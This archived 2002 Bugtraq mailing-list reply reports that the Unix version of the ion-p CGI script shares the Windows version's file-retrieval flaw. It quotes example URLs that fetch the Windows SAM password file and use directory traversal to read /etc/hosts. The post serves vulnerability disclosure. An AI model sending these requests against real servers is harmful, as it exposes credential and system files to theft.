[27691] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: ion-p.exe allows Remote File Retrieving

daemon@ATHENA.MIT.EDU (Stuart Moore)
Fri Nov 1 17:07:35 2002

Message-ID: <3DC2F55F.3A92B8B5@securityglobal.net>
Date: Fri, 01 Nov 2002 16:42:55 -0500
From: Stuart Moore <smoore.bugtraq@securityglobal.net>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi,

> ion-p.exe allows Remote File Retrieving
>
> www.Server.com/cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
>

The 'ion-p' *NIX version is also vulnerable.  Directory traversal chars can be used, too:

/cgi-bin/ion-p?page=../../../../../etc/hosts 


Bye,

Stuart


-- 
Stuart Moore
SecurityTracker.com
SecurityGlobal.net LLC


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[27691] in bugtraq

Re: ion-p.exe allows Remote File Retrieving

daemon@ATHENA.MIT.EDU (Stuart Moore)Fri Nov 1 17:07:35 2002

daemon@ATHENA.MIT.EDU (Stuart Moore)
Fri Nov 1 17:07:35 2002